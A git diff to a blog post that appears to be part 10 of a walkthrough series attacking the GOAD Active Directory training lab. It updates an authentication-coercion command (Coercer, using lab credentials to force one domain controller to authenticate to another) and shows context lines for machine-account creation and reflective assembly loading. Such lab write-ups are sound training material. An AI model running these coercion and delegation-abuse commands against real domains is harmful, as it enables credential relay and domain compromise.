diff --git a/_posts/2022-11-13-GOADv2-pwning-part10.md b/_posts/2022-11-13-GOADv2-pwning-part10.md index d713674..53bd8c3 100644 --- a/_posts/2022-11-13-GOADv2-pwning-part10.md +++ b/_posts/2022-11-13-GOADv2-pwning-part10.md @@ -97,7 +97,7 @@ $assem = [System.Reflection.Assembly]::Load($data); - And now force a coerce of the DC kingslanding to the DC winterfell. ```bash -python3 coercer.py -u arya.stark -d north.sevenkingdoms.local -p Needle -t kingslanding.sevenkingdoms.local -l winterfell +coercer coerce -u arya.stark -d north.sevenkingdoms.local -p Needle -t kingslanding.sevenkingdoms.local -l winterfell.north.sevenkingdoms.local --always-continue ``` - We look on the triage again : @@ -334,4 +334,4 @@ addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host kingsla - And i recommend you to take a look at charlie's talk about delegation : [https://www.thehacker.recipes/ad/movement/kerberos/delegations#talk](https://www.thehacker.recipes/ad/movement/kerberos/delegations#talk) -Next time we will have fun with ACL : : ([Goad pwning part11]({% link _posts/2022-12-07-GOADv2-pwning-part11.md %})) :) \ No newline at end of file +Next time we will have fun with ACL : : ([Goad pwning part11]({% link _posts/2022-12-07-GOADv2-pwning-part11.md %})) :)